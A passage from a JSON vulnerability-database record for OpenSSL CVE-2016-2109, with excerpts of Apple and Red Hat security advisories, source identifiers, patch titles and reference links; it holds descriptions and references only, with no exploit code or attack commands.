Multiple issues existed in LibreSSL before 2.2.7. These\nwere addressed by updating LibreSSL to version 2.2.7. \nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand,\nIan Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\n\nlibxml2\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact:  Parsing a maliciously crafted XML document may lead to\ndisclosure of user information\nDescription:  An access issue existed in the parsing of maliciously\ncrafted XML files. This issue was addressed through improved input\nvalidation. \nCVE-2016-4449 : Kostya Serebryany\n\nlibxml2\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact:  Multiple vulnerabilities in libxml2\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4448 : Apple\nCVE-2016-4483 : Gustavo Grieco\nCVE-2016-4614 : Nick Wellnhofe\nCVE-2016-4615 : Nick Wellnhofer\nCVE-2016-4616 : Michael Paddon\nCVE-2016-4619 : Hanno Boeck\n\nlibxslt\nAvailable for:  OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact:  Multiple vulnerabilities in libxslt\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1684 : Nicolas GrA(c)goire\nCVE-2016-4607 : Nick Wellnhofer\nCVE-2016-4608 : Nicolas GrA(c)goire\nCVE-2016-4609 : Nick Wellnhofer\nCVE-2016-4610 : Nick Wellnhofer\nCVE-2016-4612 : Nicolas GrA(c)goire\n\nLogin Window\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A malicious application may be able to execute arbitrary\ncode leading to compromise of user information\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A malicious application may be able to execute arbitrary\ncode leading to the compromise of user information\nDescription:  A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local user may be able to cause a denial of service\nDescription:  A memory initialization issue was addressed through\nimproved memory handling. \nCVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A malicious application may be able to gain root privileges\nDescription:  A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. \nCVE-2016-2105 : Guido Vranken\nCVE-2016-2106 : Guido Vranken\nCVE-2016-2107 : Juraj Somorovsky\nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\nCVE-2016-2176 : Guido Vranken\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription:  Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4596 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4597 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4600 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4602 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4598 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Processing a maliciously crafted SGI file may lead to\narbitrary code execution\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4601 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription:  A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4599 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nSafari Login AutoFill\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A user\u0027s password may be visible on screen\nDescription:  An issue existed in Safari\u0027s password auto-fill. This\nissue was addressed through improved matching of form fields. \nCVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD\n\nSandbox Profiles\nAvailable for:  OS X El Capitan v10.11 and later\nImpact:  A local application may be able to access the process list\nDescription:  An access issue existed with privileged API calls. This\nissue was addressed through additional restrictions. \nCVE-2016-4594 : Stefan Esser of SektionEins\n\nNote: OS X El Capitan 10.11.6 includes the security content of Safari\n9.1.2. For further details see https://support.apple.com/kb/HT206900\n\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y\n+cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy\npSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV\nxj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u\nwevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN\nZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k\nah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk\nmmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC\nJM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc\n55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs\nxPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5\nYozOGPQFmX0OviWCQsX6\n=ng+m\n-----END PGP SIGNATURE-----\n. Description:\n\nThis release of Red Hat JBoss Core Services httpd 2.4.23 serves as a\nreplacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2014-8176,\nCVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196,\nCVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nCVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109,\nCVE-2016-2177, CVE-2016-2178, CVE-2016-2842)\n\n* This update fixes several flaws in libxml2. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)\n\n* This update fixes two flaws in mod_cluster. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. \n\nSee the corresponding CVE pages linked to in the References section for\nmore information about each of the flaws listed in this advisory. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-2109"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      },
      {
        "db": "BID",
        "id": "87940"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-2109"
      },
      {
        "db": "PACKETSTORM",
        "id": "142803"
      },
      {
        "db": "PACKETSTORM",
        "id": "136919"
      },
      {
        "db": "PACKETSTORM",
        "id": "140056"
      },
      {
        "db": "PACKETSTORM",
        "id": "136912"
      },
      {
        "db": "PACKETSTORM",
        "id": "136958"
      },
      {
        "db": "PACKETSTORM",
        "id": "136893"
      },
      {
        "db": "PACKETSTORM",
        "id": "139379"
      },
      {
        "db": "PACKETSTORM",
        "id": "143513"
      },
      {
        "db": "PACKETSTORM",
        "id": "137958"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      }
    ],
    "trust": 2.88
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-2109",
        "trust": 3.8
      },
      {
        "db": "BID",
        "id": "87940",
        "trust": 2.0
      },
      {
        "db": "PACKETSTORM",
        "id": "136912",
        "trust": 1.8
      },
      {
        "db": "BID",
        "id": "91787",
        "trust": 1.7
      },
      {
        "db": "MCAFEE",
        "id": "SB10160",
        "trust": 1.7
      },
      {
        "db": "TENABLE",
        "id": "TNS-2016-18",
        "trust": 1.7
      },
      {
        "db": "PULSESECURE",
        "id": "SA40202",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-412672",
        "trust": 1.7
      },
      {
        "db": "SECTRACK",
        "id": "1035721",
        "trust": 1.7
      },
      {
        "db": "JUNIPER",
        "id": "JSA10759",
        "trust": 1.7
      },
      {
        "db": "JVN",
        "id": "JVNVU93163809",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU94844193",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002476",
        "trust": 0.8
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0696",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2148",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-083",
        "trust": 0.6
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-349-21",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-2109",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "142803",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136919",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "140056",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136958",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136893",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139379",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143513",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "137958",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "140182",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-2109"
      },
      {
        "db": "BID",
        "id": "87940"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      },
      {
        "db": "PACKETSTORM",
        "id": "142803"
      },
      {
        "db": "PACKETSTORM",
        "id": "136919"
      },
      {
        "db": "PACKETSTORM",
        "id": "140056"
      },
      {
        "db": "PACKETSTORM",
        "id": "136912"
      },
      {
        "db": "PACKETSTORM",
        "id": "136958"
      },
      {
        "db": "PACKETSTORM",
        "id": "136893"
      },
      {
        "db": "PACKETSTORM",
        "id": "139379"
      },
      {
        "db": "PACKETSTORM",
        "id": "143513"
      },
      {
        "db": "PACKETSTORM",
        "id": "137958"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2109"
      }
    ]
  },
  "id": "VAR-201605-0079",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.43052093714285716
  },
  "last_update_date": "2024-07-23T20:50:53.695000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004",
        "trust": 0.8,
        "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html"
      },
      {
        "title": "HT206903",
        "trust": 0.8,
        "url": "https://support.apple.com/en-us/ht206903"
      },
      {
        "title": "HT206903",
        "trust": 0.8,
        "url": "https://support.apple.com/ja-jp/ht206903"
      },
      {
        "title": "HPSBMU03691",
        "trust": 0.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722"
      },
      {
        "title": "SB10160",
        "trust": 0.8,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160"
      },
      {
        "title": "NV16-015",
        "trust": 0.8,
        "url": "http://jpn.nec.com/security-info/secinfo/nv16-015.html"
      },
      {
        "title": "Major changes between OpenSSL 1.0.1s and OpenSSL 1.0.1t [3 May 2016]",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html"
      },
      {
        "title": "Major changes between OpenSSL 1.0.2g and OpenSSL 1.0.2h [3 May 2016]",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html"
      },
      {
        "title": "Harden ASN.1 BIO handling of large amounts of data.",
        "trust": 0.8,
        "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=c62981390d6cf9e3d612c489b8b77c2913b25807"
      },
      {
        "title": "ASN.1 BIO excessive memory allocation (CVE-2016-2109)",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/secadv/20160503.txt"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "title": "Oracle Linux Bulletin - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html"
      },
      {
        "title": "Oracle Linux Bulletin - April 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html"
      },
      {
        "title": "Oracle Solaris Third Party Bulletin - April 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html"
      },
      {
        "title": "Oracle VM Server for x86 Bulletin - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "title": "RHSA-2016:0722",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html"
      },
      {
        "title": "RHSA-2016:0996",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html"
      },
      {
        "title": "SA40202",
        "trust": 0.8,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202"
      },
      {
        "title": "JSA10759",
        "trust": 0.8,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759"
      },
      {
        "title": "TLSA-2016-14",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-14j.html"
      },
      {
        "title": "HS16-023",
        "trust": 0.8,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs16-023/index.html"
      },
      {
        "title": "OpenSSL ASN.1 BIO Fixes to implement a denial of service vulnerability",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=61408"
      },
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2016/05/03/openssl_patches/"
      },
      {
        "title": "Red Hat: Important: openssl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162073 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2016-2109",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2109"
      },
      {
        "title": "Ubuntu Security Notice: openssl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2959-1"
      },
      {
        "title": "Debian Security Advisories: DSA-3566-1 openssl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=055972eb84483959232c972f757685e0"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2016-695",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-695"
      },
      {
        "title": "Tenable Security Advisories: [R5] OpenSSL \u002720160503\u0027 Advisory Affects Tenable Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-10"
      },
      {
        "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory"
      },
      {
        "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49"
      },
      {
        "title": "Tenable Security Advisories: [R3] PVS 5.1.0 Fixes Multiple Third-party Library Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-13"
      },
      {
        "title": "Symantec Security Advisories: SA123 : OpenSSL Vulnerabilities 3-May-2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=5d65f6765e60e5fe9e6998a5bde1aadc"
      },
      {
        "title": "Forcepoint Security Advisories: CVE-2016-2105, 2106, 2107, 2108, 2109, 2176 -- Security Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=01fd01e3d154696ffabfde89f4142310"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014July 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=8c840629bfabaea20b649ca3c4988587"
      },
      {
        "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=0bd8c924b56aac98dda0f5b45f425f38"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87"
      },
      {
        "title": "Tenable Security Advisories: [R7] LCE 4.8.1 Fixes Multiple Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-18"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2018",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2016-2109 "
      },
      {
        "title": "alpine-cvecheck",
        "trust": 0.1,
        "url": "https://github.com/tomwillfixit/alpine-cvecheck "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/imhunterand/hackerone-publicy-disclosed "
      },
      {
        "title": "satellite-host-cve",
        "trust": 0.1,
        "url": "https://github.com/redhatsatellite/satellite-host-cve "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-2109"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-399",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2109"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.2,
        "url": "https://www.openssl.org/news/secadv/20160503.txt"
      },
      {
        "trust": 2.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "trust": 2.0,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160504-openssl"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html"
      },
      {
        "trust": 1.8,
        "url": "https://security.gentoo.org/glsa/201612-16"
      },
      {
        "trust": 1.7,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202"
      },
      {
        "trust": 1.7,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160"
      },
      {
        "trust": 1.7,
        "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html"
      },
      {
        "trust": 1.7,
        "url": "https://support.apple.com/ht206903"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/91787"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05320149"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/87940"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00016.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00014.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00018.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-16:17.openssl.asc"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00010.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-2959-1"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00036.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00015.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00017.html"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2073.html"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2056.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20160504-0001/"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03765en_us"
      },
      {
        "trust": 1.7,
        "url": "https://source.android.com/security/bulletin/2017-07-01"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03756en_us"
      },
      {
        "trust": 1.7,
        "url": "https://www.tenable.com/security/tns-2016-18"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722"
      },
      {
        "trust": 1.7,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759"
      },
      {
        "trust": 1.7,
        "url": "http://packetstormsecurity.com/files/136912/slackware-security-advisory-openssl-updates.html"
      },
      {
        "trust": 1.7,
        "url": "https://bto.bluecoat.com/security-advisory/sa123"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00029.html"
      },
      {
        "trust": 1.7,
